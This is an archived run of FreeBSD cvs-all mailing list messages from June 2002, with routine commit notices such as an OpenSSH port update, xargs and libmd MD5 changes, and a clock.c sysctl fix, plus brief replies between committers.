cvs-all@FreeBSD.org Subject: cvs commit: ports/security/openssh Makefile distinfo pkg-plist ports/security/openssh/files patch-auth2-passwd.c patch-auth2.c patch-includes.h patch-session.c patch-ssh-Makefile patch-ssh-keysign-Makefile patch-ssh.c patch-sshconnect.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/22 05:31:19 PDT Modified files: security/openssh Makefile distinfo pkg-plist security/openssh/files patch-auth2.c patch-includes.h patch-session.c patch-ssh-Makefile patch-sshconnect.c patch-sshd-Makefile patch-sshd_config Added files: security/openssh/files patch-auth2-passwd.c patch-ssh-keysign-Makefile Removed files: security/openssh/files patch-ssh.c Log: Update to openssh-3.3 - New program ssh-keysign - New manpages for ssh_config and sshd_config - Merge Pathes to new files - Fix GCC problem with unsupported __func__ in older Releases Revision Changes Path 1.97 +3 -3 ports/security/openssh/Makefile 1.33 +2 -2 ports/security/openssh/distinfo 1.1 +14 -0 ports/security/openssh/files/patch-auth2-passwd.c (new) 1.3 +6 -18 ports/security/openssh/files/patch-auth2.c 1.3 +6 -2 ports/security/openssh/files/patch-includes.h 1.6 +18 -19 ports/security/openssh/files/patch-session.c 1.3 +10 -9 ports/security/openssh/files/patch-ssh-Makefile 1.1 +19 -0 ports/security/openssh/files/patch-ssh-keysign-Makefile (new) 1.2 +0 -12 ports/security/openssh/files/patch-ssh.c (dead) 1.2 +4 -26 ports/security/openssh/files/patch-sshconnect.c 1.3 +9 -8 ports/security/openssh/files/patch-sshd-Makefile 1.3 +4 -4 ports/security/openssh/files/patch-sshd_config 1.17 +1 -0 ports/security/openssh/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 5:47:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4568137B401; Sat, 22 Jun 2002 05:47:57 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MClv135749; Sat, 22 Jun 2002 05:47:57 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206221247.g5MClv135749@freefall.freebsd.org> From: Juli Mallett Date: Sat, 22 Jun 2002 05:47:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/xargs xargs.1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/22 05:47:56 PDT Modified files: usr.bin/xargs xargs.1 Log: When giving an example that relies on shell expansion/globbing, don't use a replstr for -J that will be interpereted by the shell. MFC after: 1 day Revision Changes Path 1.23 +1 -1 src/usr.bin/xargs/xargs.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 5:54:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E1B4F37B404; Sat, 22 Jun 2002 05:54:11 -0700 (PDT) Received: (from phk@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MCsBt36492; Sat, 22 Jun 2002 05:54:11 -0700 (PDT) (envelope-from phk) Message-Id: <200206221254.g5MCsBt36492@freefall.freebsd.org> From: Poul-Henning Kamp Date: Sat, 22 Jun 2002 05:54:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libmd md5c.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG phk 2002/06/22 05:54:11 PDT Modified files: lib/libmd md5c.c Log: Improve the handling of Encode and Decode operations in MD5. Use memcpy for all little-endian architectures, sys/kern/md5c.c indicates this should be safe for all currently supported LE archs. Change the Encode and Decode functions for other archs to use le32toh() and htole32() functions instead of explicit byte shuffling. On sparc64 this gives md5(1) about 8% speed increase. Revision Changes Path 1.14 +15 -22 src/lib/libmd/md5c.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 5:58:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9154D37B404; Sat, 22 Jun 2002 05:58:42 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MCwge36775; Sat, 22 Jun 2002 05:58:42 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206221258.g5MCwge36775@freefall.freebsd.org> From: Juli Mallett Date: Sat, 22 Jun 2002 05:58:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/xargs strnsubst.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/22 05:58:42 PDT Modified files: usr.bin/xargs strnsubst.c Log: Check for results of repeated calls to strnsubst(), as well as for the behaviour with NULL match string, as that has changed over time. Revision Changes Path 1.6 +17 -6 src/usr.bin/xargs/strnsubst.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 5:59:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2ADC137B401; Sat, 22 Jun 2002 05:59:41 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MCxfn36859; Sat, 22 Jun 2002 05:59:41 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206221259.g5MCxfn36859@freefall.freebsd.org> From: Juli Mallett Date: Sat, 22 Jun 2002 05:59:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/xargs xargs.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/22 05:59:41 PDT Modified files: usr.bin/xargs xargs.c Log: Stylistic nit: main()'s argv argument is char*[], and functions that may inherit that arg should use char*[] as well. Revision Changes Path 1.40 +5 -5 src/usr.bin/xargs/xargs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 6: 0:25 2002 Delivered-To: cvs-all@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 65E0337B407; Sat, 22 Jun 2002 05:59:46 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5MCvqCn059675; Sat, 22 Jun 2002 14:57:53 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/lib/libmd md5c.c In-Reply-To: Your message of "Sat, 22 Jun 2002 05:54:11 PDT." <200206221254.g5MCsBt36492@freefall.freebsd.org> Date: Sat, 22 Jun 2002 14:57:52 +0200 Message-ID: <59674.1024750672@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I would be grateful if somebody would run "make test" in src/lib/libmd on alpha and ia64, just to make sure this works as expected. Poul-Henning In message <200206221254.g5MCsBt36492@freefall.freebsd.org>, Poul-Henning Kamp writes: >phk 2002/06/22 05:54:11 PDT > > Modified files: > lib/libmd md5c.c > Log: > Improve the handling of Encode and Decode operations in MD5. > > Use memcpy for all little-endian architectures, sys/kern/md5c.c indicates > this should be safe for all currently supported LE archs. > > Change the Encode and Decode functions for other archs to use le32toh() > and htole32() functions instead of explicit byte shuffling. > > On sparc64 this gives md5(1) about 8% speed increase. > > Revision Changes Path > 1.14 +15 -22 src/lib/libmd/md5c.c > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 6: 1:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B72BC37B401; Sat, 22 Jun 2002 06:01:39 -0700 (PDT) Received: (from hrs@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MD1du37213; Sat, 22 Jun 2002 06:01:39 -0700 (PDT) (envelope-from hrs) Message-Id: <200206221301.g5MD1du37213@freefall.freebsd.org> From: Hiroki Sato Date: Sat, 22 Jun 2002 06:01:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/ja_JP.eucJP/books/handbook/x11 chapter.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hrs 2002/06/22 06:01:39 PDT Modified files: ja_JP.eucJP/books/handbook/x11 chapter.sgml Log: Fix a typo. Pointed out by: YAMAMURA Hideki References: [doc-jp-work 404] Revision Changes Path 1.13 +1 -1 doc/ja_JP.eucJP/books/handbook/x11/chapter.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 6:52:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5D3EC37B403; Sat, 22 Jun 2002 06:52:29 -0700 (PDT) Received: (from bsd@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MDqT948551; Sat, 22 Jun 2002 06:52:29 -0700 (PDT) (envelope-from bsd) Message-Id: <200206221352.g5MDqT948551@freefall.freebsd.org> From: "Brian S. Dean" Date: Sat, 22 Jun 2002 06:52:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/comms/comserv Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bsd 2002/06/22 06:52:29 PDT Modified files: comms/comserv Makefile distinfo Log: Upgrade to 1.4.3. Revision Changes Path 1.15 +1 -1 ports/comms/comserv/Makefile 1.14 +1 -1 ports/comms/comserv/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 6:54:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EB41037B405; Sat, 22 Jun 2002 06:54:17 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MDsHG48793; Sat, 22 Jun 2002 06:54:17 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221354.g5MDsHG48793@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 06:54:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/althea Makefile ports/mail/glacier Makefile ports/mail/liamail Makefile ports/mail/mreport Makefile ports/mail/muttzilla Makefile ports/mail/stuphead Makefile ports/mail/xmailbox Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 06:54:17 PDT Modified files: mail/althea Makefile mail/glacier Makefile mail/liamail Makefile mail/mreport Makefile mail/muttzilla Makefile mail/stuphead Makefile mail/xmailbox Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39652 Submitted by: Oliver Braun Revision Changes Path 1.7 +3 -1 ports/mail/althea/Makefile 1.10 +4 -3 ports/mail/glacier/Makefile 1.2 +3 -2 ports/mail/liamail/Makefile 1.7 +4 -3 ports/mail/mreport/Makefile 1.13 +3 -1 ports/mail/muttzilla/Makefile 1.13 +3 -2 ports/mail/stuphead/Makefile 1.12 +3 -2 ports/mail/xmailbox/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 7: 7:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3BC6437B400; Sat, 22 Jun 2002 07:07:57 -0700 (PDT) Received: (from bsd@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ME7vK54307; Sat, 22 Jun 2002 07:07:57 -0700 (PDT) (envelope-from bsd) Message-Id: <200206221407.g5ME7vK54307@freefall.freebsd.org> From: "Brian S. Dean" Date: Sat, 22 Jun 2002 07:07:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/avrprog Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bsd 2002/06/22 07:07:56 PDT Modified files: devel/avrprog Makefile distinfo Log: Upgrade to version 2.0.5. Revision Changes Path 1.13 +1 -1 ports/devel/avrprog/Makefile 1.13 +1 -1 ports/devel/avrprog/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 8:57: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0106C37B404; Sat, 22 Jun 2002 08:57:05 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MFv4D68702; Sat, 22 Jun 2002 08:57:04 -0700 (PDT) (envelope-from pat) Message-Id: <200206221557.g5MFv4D68702@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 08:57:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/zziplib Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 08:57:04 PDT Modified files: devel/zziplib Makefile distinfo Log: Update to 0.10.54 PR: 39657 Submitted by: maintainer Revision Changes Path 1.4 +1 -2 ports/devel/zziplib/Makefile 1.3 +1 -1 ports/devel/zziplib/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:14:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EF85637B400; Sat, 22 Jun 2002 09:14:46 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MGEk774598; Sat, 22 Jun 2002 09:14:46 -0700 (PDT) (envelope-from pat) Message-Id: <200206221614.g5MGEk774598@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 09:14:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/russian/apache13 Makefile distinfo pkg-plist ports/russian/apache13/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 09:14:46 PDT Modified files: russian/apache13 Makefile distinfo pkg-plist russian/apache13/files patch-aa Log: - Update to 1.3.26.30.13 - Unmark forbidden PR: 39655 Submitted by: maintainer Revision Changes Path 1.23 +3 -6 ports/russian/apache13/Makefile 1.13 +2 -2 ports/russian/apache13/distinfo 1.4 +4 -8 ports/russian/apache13/files/patch-aa 1.10 +61 -22 ports/russian/apache13/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:24: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D993637B404; Sat, 22 Jun 2002 09:24:04 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MGO4X75815; Sat, 22 Jun 2002 09:24:04 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206221624.g5MGO4X75815@freefall.freebsd.org> From: Dirk Meyer Date: Sat, 22 Jun 2002 09:24:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/openssh-portable Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/22 09:24:04 PDT Modified files: security/openssh-portable Makefile distinfo pkg-plist Log: Update: openssh-3.2.3p1 New manpages: ssh-keysign.8 sftp-server.8 sshd.8 New program ssh-keysign Revision Changes Path 1.39 +3 -3 ports/security/openssh-portable/Makefile 1.13 +1 -1 ports/security/openssh-portable/distinfo 1.5 +1 -0 ports/security/openssh-portable/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:30:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3ADFB37B401; Sat, 22 Jun 2002 09:30:19 -0700 (PDT) Received: (from mp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MGUJH76448; Sat, 22 Jun 2002 09:30:19 -0700 (PDT) (envelope-from mp) Message-Id: <200206221630.g5MGUJH76448@freefall.freebsd.org> From: Mark Peek Date: Sat, 22 Jun 2002 09:30:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/isa clock.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mp 2002/06/22 09:30:19 PDT Modified files: sys/i386/isa clock.c Log: Clock frequencies reported by sysctl should be unsigned values. Discovered when machdep.tsc_freq returned a negative number on a 2.2GHz Xeon. Submitted by: Brian Harrison Reviewed by: phk MFC after: 1 week Revision Changes Path 1.187 +2 -2 src/sys/i386/isa/clock.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:32:56 2002 Delivered-To: cvs-all@freebsd.org Received: from iguana.icir.org (iguana.icir.org [192.150.187.36]) by hub.freebsd.org (Postfix) with ESMTP id 5AE3B37B400; Sat, 22 Jun 2002 09:32:51 -0700 (PDT) Received: (from rizzo@localhost) by iguana.icir.org (8.11.6/8.11.3) id g5MGWoS95199; Sat, 22 Jun 2002 09:32:50 -0700 (PDT) (envelope-from rizzo) Date: Sat, 22 Jun 2002 09:32:50 -0700 From: Luigi Rizzo To: Mark Peek Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/i386/isa clock.c Message-ID: <20020622093250.C92778@iguana.icir.org> References: <200206221630.g5MGUJH76448@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206221630.g5MGUJH76448@freefall.freebsd.org>; from mp@FreeBSD.org on Sat, Jun 22, 2002 at 09:30:19AM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 09:30:19AM -0700, Mark Peek wrote: > mp 2002/06/22 09:30:19 PDT > > Modified files: > sys/i386/isa clock.c > Log: > Clock frequencies reported by sysctl should be unsigned values. Discovered > when machdep.tsc_freq returned a negative number on a 2.2GHz Xeon. so we have a couple of years before hitting another barrier with 4GHz boxes... cheers luigi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:33:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6FA3E37B400; Sat, 22 Jun 2002 09:33:29 -0700 (PDT) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MGXTH76913; Sat, 22 Jun 2002 09:33:29 -0700 (PDT) (envelope-from n_hibma) Message-Id: <200206221633.g5MGXTH76913@freefall.freebsd.org> From: Nick Hibma Date: Sat, 22 Jun 2002 09:33:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/sio sio.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG n_hibma 2002/06/22 09:33:29 PDT Modified files: sys/dev/sio sio.c Log: Make this compile on Alpha. Revision Changes Path 1.376 +2 -2 src/sys/dev/sio/sio.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:34:58 2002 Delivered-To: cvs-all@freebsd.org Received: from van-laarhoven.org (ap-z-5ab8.adsl.wanadoo.nl [212.129.218.184]) by hub.freebsd.org (Postfix) with SMTP id C468937B403 for ; Sat, 22 Jun 2002 09:34:51 -0700 (PDT) Received: (qmail 22402 invoked from network); 22 Jun 2002 16:34:50 -0000 Received: from heather.van-laarhoven.org (10.66.0.2) by uitsmijter.van-laarhoven.org with SMTP; 22 Jun 2002 16:34:50 -0000 Date: Sat, 22 Jun 2002 18:34:50 +0200 (CEST) From: Nick Hibma To: "cvs-committers@FreeBSD.org" , "cvs-all@FreeBSD.org" Subject: Re: cvs commit: src/sys/dev/sio sio.c In-Reply-To: <200206221633.g5MGXTH76913@freefall.freebsd.org> Message-ID: <20020622183404.V245-100000@heather.van-laarhoven.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG My apologies to the people running alphas for leaving this broken for two days. I am doing a cross build at the mo' to check that I haven't fat fingered it AGAIN. Cheers, Nick. On Sat, 22 Jun 2002, Nick Hibma wrote: > n_hibma 2002/06/22 09:33:29 PDT > > Modified files: > sys/dev/sio sio.c > Log: > Make this compile on Alpha. > > Revision Changes Path > 1.376 +2 -2 src/sys/dev/sio/sio.c > > http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/dev/sio/sio.c?r1=1.375&r2=1.376&cvsroot=freebsd > -- n_hibma@van-laarhoven.org http://www.van-laarhoven.org/ n_hibma@FreeBSD.org http://www.etla.net/~n_hibma/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:35:58 2002 Delivered-To: cvs-all@freebsd.org Received: from relay.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id B734337B403 for ; Sat, 22 Jun 2002 09:35:54 -0700 (PDT) Received: (qmail 69603 invoked from network); 22 Jun 2002 16:35:53 -0000 Received: from 12-236-91-101.client.attbi.com (HELO ?10.1.1.73?) (12.236.91.101) by relay1.pair.com with SMTP; 22 Jun 2002 16:35:53 -0000 X-pair-Authenticated: 12.236.91.101 Mime-Version: 1.0 X-Sender: (Unverified) Message-Id: In-Reply-To: <200206221630.g5MGUJH76448@freefall.freebsd.org> References: <200206221630.g5MGUJH76448@freefall.freebsd.org> Date: Sat, 22 Jun 2002 09:35:49 -0700 To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org From: Mark Peek Subject: Re: cvs commit: src/sys/i386/isa clock.c Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 9:30 AM -0700 6/22/02, Mark Peek wrote: >mp 2002/06/22 09:30:19 PDT > > Modified files: > sys/i386/isa clock.c > Log: > Clock frequencies reported by sysctl should be unsigned values. Discovered > when machdep.tsc_freq returned a negative number on a 2.2GHz Xeon. > > Submitted by: Brian Harrison > Reviewed by: phk > MFC after: 1 week > > Revision Changes Path > 1.187 +2 -2 src/sys/i386/isa/clock.c Oops, I forgot to add: Requested a 2+GHz server be sent to him for extended testing of this patch: phk :-) Mark To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:41:21 2002 Delivered-To: cvs-all@freebsd.org Received: from relay.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id 55F1A37B404 for ; Sat, 22 Jun 2002 09:41:14 -0700 (PDT) Received: (qmail 70156 invoked from network); 22 Jun 2002 16:41:13 -0000 Received: from 12-236-91-101.client.attbi.com (HELO ?10.1.1.73?) (12.236.91.101) by relay1.pair.com with SMTP; 22 Jun 2002 16:41:13 -0000 X-pair-Authenticated: 12.236.91.101 Mime-Version: 1.0 X-Sender: markfree@mail.peek.org Message-Id: In-Reply-To: <20020622093250.C92778@iguana.icir.org> References: <200206221630.g5MGUJH76448@freefall.freebsd.org> <20020622093250.C92778@iguana.icir.org> Date: Sat, 22 Jun 2002 09:41:13 -0700 To: Luigi Rizzo From: Mark Peek Subject: Re: cvs commit: src/sys/i386/isa clock.c Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 9:32 AM -0700 6/22/02, Luigi Rizzo wrote: >On Sat, Jun 22, 2002 at 09:30:19AM -0700, Mark Peek wrote: >> mp 2002/06/22 09:30:19 PDT >> >> Modified files: >> sys/i386/isa clock.c >> Log: >> Clock frequencies reported by sysctl should be unsigned values. Discovered >> when machdep.tsc_freq returned a negative number on a 2.2GHz Xeon. > >so we have a couple of years before hitting another barrier with 4GHz >boxes... Shhh, don't mention this on the public lists. Once the press hears about a 4GHz issue it will be Y2K all over again. :-) But yes, we realized this as well when we made the patch. Mark To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:41:51 2002 Delivered-To: cvs-all@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 2015B37B406; Sat, 22 Jun 2002 09:41:22 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 38E835361; Sat, 22 Jun 2002 18:41:18 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Poul-Henning Kamp Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/lib/libmd md5c.c References: <59674.1024750672@critter.freebsd.dk> From: Dag-Erling Smorgrav Date: 22 Jun 2002 18:41:17 +0200 In-Reply-To: <59674.1024750672@critter.freebsd.dk> 